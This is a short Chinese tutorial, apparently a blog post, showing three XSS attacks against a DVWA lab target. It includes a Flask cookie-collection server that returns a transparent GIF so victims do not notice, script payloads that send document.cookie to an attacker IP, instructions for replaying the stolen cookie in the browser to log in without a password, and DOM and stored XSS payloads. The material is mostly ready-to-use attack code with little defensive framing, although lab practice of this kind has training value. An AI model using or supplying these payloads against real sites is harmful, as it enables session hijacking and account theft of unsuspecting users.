3种XSS攻击简单案例

1、接收cookie端攻击机上用python写个接收web程序flask

python 复制代码
from flask import Flask, request, Response

app = Flask(__name__)

@app.route('/')
def save_cookie():
    cookie = request.args.get('cookie', '')
    if cookie:
        with open('/root/cookies.txt', 'a') as f:
            f.write(f"{cookie}\n")
    
    # 返回1x1透明GIF(避免被用户察觉)
    return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;',  mimetype='image/gif')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

2、dvwa靶机上进行xss测试(3种方法)

php 复制代码
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>

3、把获取的cookie中最后一个等号后面的是cookie值,打开火狐按F12,点击存储store,把获取的cookie值替换进去,就能直接打开不用账户密码了

???

dvwa中DOM型注入(直接在xss的dom网址上改后面的default=就能获取cookie)

php 复制代码
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>

???

dvwa中存储型注入(先按F12把name表单长度改长一点)

name中输入:

php 复制代码
<script>alert(document.cookie);</script>

message中随便输入:Payload

以后每次打开这个存储型页面就会弹cookie出来

相关推荐
于慨15 分钟前
Capacitor
前端
IT凝冬37 分钟前
liunx 的 centos7 安装ngin
前端
赵锦川38 分钟前
大屏比例缩放
前端·javascript·html
于慨1 小时前
tauri
java·服务器·前端
贼爱学习的小黄2 小时前
NC BIP参照开发
java·前端·nc
小江的记录本2 小时前
【MyBatis-Plus】MyBatis-Plus的核心特性、条件构造器、分页插件、乐观锁插件
java·前端·spring boot·后端·sql·tomcat·mybatis
光影少年2 小时前
如何进行前端性能优化?
前端·性能优化
Dxy12393102162 小时前
js如何把字符串转数字
开发语言·前端·javascript
爱写bug的野原新之助2 小时前
爬虫之补环境:加载原型链
前端·javascript·爬虫
陈广亮2 小时前
工具指南7-Unix时间戳转换工具
前端